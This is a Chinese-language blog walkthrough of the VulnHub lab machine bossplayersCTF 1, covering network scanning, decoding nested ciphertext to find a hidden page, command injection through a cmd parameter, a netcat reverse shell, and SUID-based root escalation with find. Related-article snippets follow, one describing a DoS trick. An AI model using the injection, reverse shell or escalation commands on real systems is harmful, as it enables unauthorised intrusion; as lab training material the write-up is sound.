VulnHub 靶机系列之bossplayersCTF1

最新推荐文章于 2024-11-11 17:17:05 发布
最新推荐文章于 2024-11-11 17:17:05 发布
阅读量1.1k 收藏 30
点赞数 30
文章标签: 网络 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53974661/article/details/142795992
版权

先下载靶机

靶机下载链接:

bossplayersCTF: 1 ~ VulnHub

https://download.vulnhub.com/bossplayers/bossplayersCTF.ova

收集信息

1.发现靶机ip

查看kali的ip

靶机要和kali在同一模式下(NAT)

靶机ip

        arp-scan --interface=eth0 --localnet  

2. 扫描端口

nmap -sS -sV -T4 -A -p- 192.168.239.17

发现一个80端口(网页打不开)还有一个22端口

3.对网站进行爆破

dirb http://192.168.239.17 

 发现三个目录

这个应该是一个加密的

难度级别:[*][][][][]

描述:您好!我为那些想要上手的人创建了极其简单的 CTF。掌握方法论,避免误入歧途!我希望你喜欢这个,最重要的是,请玩得开心!

您无权访问此服务器上的/server-status。

Apache/2.4.38 (Debian) 服务器位于 192.168.239.17 端口 80

发现三个目录好像都没有什么用

先把一个密钥解密一下

意思:在努力点,兄弟(也是没用的信息)

4.利用源代码查找有用信息

view-source:http://192.168.239.17/index.html 网页下发现密文

进行破解

解密出来还是密文 嵌套

经过两次出现了想要的东西

得出的应该可以进行访问的URL路径:

http://192.168.239.17/workinginprogress.php

利用漏洞-命令注入

修复访问的URL :

http://192.168.239.17/workinginprogress.php?cmd=whoami

进行id命令

进行pwd命令

uname- -a 查看内核版本

需要的信息的大部分都已经掌握

接下我们进行反弹shell

反弹shell

在kali机上监听

nc -lvp 4567

fne 

URL改为http://192.168.200.132/workinginprogress.php?cmd=nc -e /bin/bash 192.168.239.17 4567

得到shell后执行操作,发现和我们在浏览器修改传递参数得到的内容一致

┌──(root㉿kali)-[~]                                                                                                             
└─# nc -lvvp 4567                         
listening on [any] 4567 ...
192.168.239.17: inverse host lookup failed: Unknown host
connect to [192.168.239.13] from (UNKNOWN) [192.168.239.17] 37288
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
pwd
/var/www/html
uname -a
Linux bossplayers 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux

1.使用python命令转换成交互式shell

 python -c 'import pty;pty.spawn("/bin/bash")'

2.提权

find / -perm -u=s -type f 2>/dev/null

find . -exec /bin/bash -p \;

flat

破解密文   Y29uZ3JhdHVsYXRpb25zCg==

这个杀手有点爽
关注
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
嵌入式学习-网络高级-Day01
Xiaomo1536的博客
11-06 1160
对于读数据以及写单个来说,在主机询问报文里面报文头中字节长度固定,都是0x0006,(1个字节的单元标识符,1个字节功能码,2个字节的地址,2个字节的数据)输入寄存器,这个和保持寄存器类似,但是也是只支持读而不能写。报文头------功能码-------起始地址-------数量--------字节计数--------数据。报文头(字节长度可能发生变化)------功能码------字节计数-------数据。报文头------功能码-------地址-------数据/断通标志(2个字节)
字节序(Byte Order)
weixin_50993868的博客
11-11 170
字节序与平台字节序转换字节序(Byte Order)是指数据在内存中存储时字节的排列顺序。由于不同的计算机体系结构可能采用不同的字节序,因此理解字节序非常重要,特别是在处理多平台数据传输或存储时。
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 131
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
Linux网络协议socket
Au_ust的博客
11-05 1228
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
数据安全、信息安全、网络安全区别与联系
2401_88326591的博客
11-07 887
信息安全是保护信息系统免受意外或故意的非授权泄漏、传递、修改或破坏。
06 网络编程基础
Elaine2391的博客
11-07 1060
如果客户端发送的数据没有明确的结束标记,服务器可能会一直等待更多的数据,而客户端则可能因为没有收到响应而卡住。System.out.println("======以下代码是读取响应的结果======");通过这些方法,你可以确保客户端和服务器之间的通信具有明确的数据边界,避免因缺少结束标记而导致的问题。客户端收到服务器的SYN+ACK包后,发送一个ACK(确认)包,确认收到服务器的SYN+ACK包。System.out.println("接收到的数据报:" + message);
关于诊断中的各种时间参数
WE_BIG的博客
11-07 839
因为不会转载,故在这里贴出原文连接,写的非常好!条理清晰,一遍看懂@king110108。
Suricata
最新发布
zhuge_long的专栏
11-11 234
一条ICMP报文有四个重要内容,可与相应的ICMP关键字相匹配。它们是:消息的类型、代码、ID和序列。通过ICMP的type进行匹配alert icmp any any any any (msg:"icmp流量预警";itype:8;sid:10021;
Hyperledger Fabric 入门笔记(十六)Fabric V2.5 测试网络部署补充 - 手动从通道中移除组织
sbsy123456的博客
11-06 433
本节介绍如何从包含了组织Org1、Org2和Org3的Fabric测试网络中移除组织Org2。
VScode插件:前端每日一题
p_s_p的博客
11-11 163
VScode插件:前端每日一题 WebSocket 中的心跳是为了解决什么问题?
支持 Win10 的网络环境模拟(丢包,延迟,带宽)
Skywind Inside
11-09 328
升级 Windows 10 以后,原来各种网络模拟软件都挂掉了,目前能用的就是只有 clumsy,唯一问题是不支持模拟带宽,那么平时要模拟一些糟糕的网络情况的话,是不太方便的,而开虚拟机用 Linux tc 或者设置个远程 linux 网关又很蛋疼,于是我顺便给他加了个带宽模拟功能:
网络基础 - 传输方式的分类
chirrupy_hamal的博客
11-11 721
网络基础 - 传输方式的分类
案例精选 | 河北省某检察院安全运营中异构日志数据融合的实践探索
juminfo的博客
11-08 850
河北省某检察院是当地重要的法律监督机构,肩负着维护法律尊严和社会公平正义的重要职责。该机构依法独立行使检察权,负责对犯罪行为提起公诉,并监督整个诉讼过程,同时积极参与社会治理,保护公民权益,推动法治社会的建设与发展。近年来,随着信息化技术的快速发展,河北省某检察院积极响应国家号召,倡导并实践“智慧检察”的先进理念,致力于推进检察工作的现代化转型。特别是在数字化检委会会议系统的建设上取得了显著成效,成功实现了会议的“无纸化”操作。
软考教材重点内容 信息安全工程师 第 2 章 网络攻击原理
it知识分享 free for nothing..
11-06 698
软考教材重点内容 信息安全工程师 第 2 章 网络攻击原理
vulnhub靶机系列
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值